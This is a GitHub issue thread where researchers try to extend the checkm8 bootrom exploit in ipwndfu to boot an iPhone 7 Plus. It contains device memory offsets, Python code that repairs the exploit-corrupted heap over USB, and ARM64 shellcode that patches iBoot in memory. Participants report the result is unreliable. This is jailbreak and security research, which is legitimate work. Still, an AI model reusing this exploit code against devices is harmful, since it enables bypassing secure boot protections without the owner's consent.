axi0mX
Trying to port the "--boot" option to iPhone7+ (13.0) without success (help will be appreciated)
ipwndfu git:(master) ✗ ./ipwndfu --boot
CPID:8010 CPRV:11 CPFM:03 SCEP:01 BDID:0E ECID:001E78DA04B88D26 IBFL:3C SRTG:[iBoot-2696.0.0.1.33] PWND:[checkm8]
Traceback (most recent call last):
File "./ipwndfu", line 419, in
I'm using the following offsets (not sure that all are correct for my platform):
HEAP_BASE = 0x1801B4000 # HEAP BASE can be advised from load_address in main() HEAP_WRITE_OFFSET = 0x5000 # UNK HEAP_WRITE_HASH = 0x10000D4EC # calculate_block_checksum ?? HEAP_CHECK_ALL = 0x10000F8B4 # heap_verify ??
HEAP_STATE = 0x180088BA8 # see heap_set_cookie (chunk_count ?? ) (pointer to HEAP_BASE) NAND_BOOT_JUMP = 0x100000628 # initiate a boot...with force_dfu = 0
BOOTSTRAP_TASK_LR = 0x180015F88 # UNK (?? don't know how to find it on my platform) DFU_BOOL = 0x180088AC0 # dfu_done (see handle_interface_request) DFU_NOTIFY = 0x10000AEE8 # event_signal (see handle_interface_request) DFU_STATE = 0x180088AF0 # dfu_event (see handle_interface_request) TRAMPOLINE = 0x1800AC000 # see platform_get_boot_trampoline()
found one mistake in that offsets HEAP_WRITE_HASH is 0x10000F364 and not as mentioned on A10. but still have problems when running HEAP_CHECK_ALL
You have correct values for the things you can reasonably find statically now. Try dumping some memory to get the last ones.
Also, even when you get it working, it will take about ~10 tries each boot to get it working, seems very unreliable for the t8010.
You have correct values for the things you can reasonably find statically now. Try dumping some memory to get the last ones.
I have a mem-dump for the iPhone X vs the iPhone7+
I think one of the issues is the 0x5000 offset where it tries to fix the heap that checkm8 exploit curropted.. i think that value is not correct for the iPhone7+
mabe because the configuration is different...
Also, even when you get it working, it will take about ~10 tries each boot to get it working, seems very unreliable for the t8010.
why is that? after you fix the heap it should be reliable no?
why is that? after you fix the heap it should be reliable no?
Not sure, I've been able to consistently pass heap_check_all, but still panic later. I sometimes (rarely) even panic in -p, so I suspect there is just a low failure rate that is exponentially applied when you start doing many things.
I think one of the issues is the 0x5000 offset where it tries to fix the heap that checkm8 exploit curropted.. i think that value is not correct for the iPhone7+
No it is not correct. What repairing the heap does is marking your previously UAF'ed chunks as allocated. Start looking for your untagged chunks, find their offsets and tag them as allocated. Also, try setting 0 instead of HEAP_STATE, pretty sure that was something they added (the pointer to HEAP_STATE in the chunks) somewhere after t8010, but before t8015.
why is that? after you fix the heap it should be reliable no?
Not sure, I've been able to consistently pass heap_check_all, but still panic later. I sometimes (rarely) even panic in -p, so I suspect there is just a low failure rate that is exponentially applied when you start doing many things.
I think one of the issues is the 0x5000 offset where it tries to fix the heap that checkm8 exploit curropted.. i think that value is not correct for the iPhone7+
No it is not correct. What repairing the heap does is marking your previously UAF'ed chunks as allocated. Start looking for your untagged chunks, find their offsets and tag them as allocated. Also, try setting 0 instead of HEAP_STATE, pretty sure that was something they added (the pointer to HEAP_STATE in the chunks) somewhere after t8010, but before t8015.
That seems to work! thanks! so weird that you must put the padding to 0 to make it work. can you share with me what is the meaning of BOOTSTRAP_TASK_LR --> and how to find it on other platform.
I'm trying to dump it's memory on iPhone X - maybe it will tell me something.
I'm trying to dump it's memory on iPhone X - maybe it will tell me something.
Yeah I havn't given you any values so that you can experience finding them yourself. Just dump it on the X and you will see what it is right away, and find its location on your phone too. Just remember the name of it when looking at the value. It's on the stack.
HEAP_BASE = 0x1801B4000 # HEAP BASE can be advised from load_address in main()
HEAP_WRITE_OFFSET = 0x5180 # The base offset in the HEAP that checkm8 curropted
HEAP_WRITE_HASH = 0x10000F364 # calculate_block_checksum (one of the 2 functiosn that invoke siphash_aligned) - to find siphash_aligned look for 0x736F6D6570736575
HEAP_CHECK_ALL = 0x10000F8B4 # heap_verify
NAND_BOOT_JUMP = 0x100000628 # initate a boot...with force_dfu = 0
BOOTSTRAP_TASK_LR = 0x1800a9f68 # address in stack where the code should return to, after calling getDFUImage
DFU_BOOL = 0x180088AC0 # dfu_done (see handle_interface_request)
DFU_NOTIFY = 0x10000AEE8 # event_signal (see handle_interface_request)
DFU_STATE = 0x180088AF0 # dfu_event (see handle_interface_request)
TRAMPOLINE = 0x1800AC000 # see L_boot_trampoline_dst --> last const after main or the valure returned by platform_get_boot_trampoline()
# This structs below are heap_blocks:
block1 = struct.pack('<8Q', 0, 0, 0, 0, 2, 132, 128, 0)
block2 = struct.pack('<8Q', 0, 0, 0, 0, 2, 8, 128, 0)
device = usbexec.PwnedUSBDevice()
device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET , block1)
device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x80, block2)
device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x100, block2)
device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x180, block2)
device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET )
device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x80)
device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x100)
device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x180)
print 'After Heap repaired.'
device.write_memory(TRAMPOLINE, checkm8.asm_arm64_branch(TRAMPOLINE, TRAMPOLINE + 0x400))
device.write_memory(TRAMPOLINE + 0x400, open('bin/t8010_shellcode_arm64.bin').read())
device.write_memory_ptr(BOOTSTRAP_TASK_LR, NAND_BOOT_JUMP)
device.write_memory(DFU_BOOL, '\x01')
device.execute(0, DFU_NOTIFY, DFU_STATE)
print 'Booted.'
t8010_shellcode_arm64.S:
` .text
.pool .set JUMP_BACK, 0x1800AC004 .set WRITE_ADDR, 0x1800c56a0 .set WRITE_VALUE, 0x9100C484
.globl _main _main: MSR DAIFSET, #0xF LDR X5, =WRITE_ADDR LDR W6, =WRITE_VALUE STR W6, [X5]
LDR X5, =JUMP_BACK BR X5
`
No, never managed to see the verbose boot working even once. don't know what's the problem. trying to go over https://github.com/akayn/ipwndfu fork. and see what i can do from there.
Hello everyone, I have this error on iPhone 7 Plus (iOS 13.2.3)
Traceback (most recent call last): File "./ipwndfu", line 48, in <module> device = dfu.acquire_device() File "/Users/haiderboudjemeline/Desktop/Fichiers/ipwndfu-master/dfu.py", line 16, in acquire_device for device in usb.core.find(find_all=True, idVendor=0x5AC, idProduct=0x1227, backend=backend): File "/Users/haiderboudjemeline/Desktop/Fichiers/ipwndfu-master/usb/core.py", line 1263, in find raise NoBackendError('No backend available') usb.core.NoBackendError: No backend available
@sitay1 Hi! Can you please explain how you got WRITE_ADDR and WRITE_VALUE in your shell code? Thanks.
I guess that it needs for patching iBoot in memory so it passes -v flag to kernelcache image?
WriteValue is the opcode you want to patch. WriteAddress is where you want to do the patch. If you look in the iBoot code for iPhone X You see that it changes X4 from pointing to %s to -v By adding an offset to X4
Just found the correct place on the relevant IBoot code (compare the decrypted iBoot for both platform)
FYI, I haven’t actually managed to the verbose boot working on A10. So maybe I’m missing something.
Sent from my iPhone
On 30 Nov 2019, at 9:48 PM, Krisanov Anton [email protected] wrote:
I guess that it needs for patching iBoot in memory so it passes -v flag to kernelcache image?
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub, or unsubscribe.
@sitay1 Thanks! So you managed to just boot iPhone 7 by this script, but your shell payload not leading to make verbose boot? Or device not booting at all?
It does boot "normally" not sure if it's because something is failing...and the device boots..or "by design" and just not printing the verbose logs - can you verify the offset for "-v" that i have used? does it work for you?
@sitay1 Looks like bootrom just crashes and we see just reboot, not boot "by design". I think so because I've tried .set JUMP_BACK, 0x1800AC000 to create infinite loop but device just boots normally.